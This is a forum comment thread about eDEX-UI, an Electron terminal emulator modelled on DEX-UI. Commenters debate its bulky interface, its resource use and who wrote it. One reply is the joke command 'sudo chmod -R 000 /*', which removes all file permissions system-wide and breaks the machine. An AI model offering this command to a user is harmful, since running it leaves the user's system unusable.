Terminal replacement

Interesting, looks a bit too bulky though, looks like something you have to run in full screen, which might be a bit inconvenient

🙂

I meant the UI.

the ui is built in electron, which is notoriously CPU/RAM intensive

I know it's built in electron, I'm talking about the UI, it's made for show and not actual use. I use another Electron based terminal emulator called HyperTerm, and the CPU/RAM usage is quite reasonable.

I installed it, but it just gets stuck in an empty terminal, then it errors out after a few minutes.

Ohh right, I remember seeing it on r/unixporn. Are you the author?

Either way, really cool to look at - just not that useful... not that it needs to be.

I think he means the amount of space the UI takes up on your screen - it's just a lot of borders around your terminal.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

DEX-UI was not made to actually be usable. Inspired by DEX-UI recently a guy called GitSquared made EDEX-UI. This though, is actually very functional. The terminal used can be changed by editing the json like mentioned. If you install git bash you can make it work on windows with a bash terminal.

I do, and you clearly didn't know what you were talking about before.

This is a terminal based on DEX-UI but is built on Electron.

Here are some screenshots and a link to the binaries for macOS, Linux and Windows.

The first link goes to DEX-UI, Seena Burns project. Then the link to more screenshots and are GitSquareds project. So you don't know the difference. Before you share these kind of things please know what you are talking about, and credit the author

I'll just stick with rxvt...
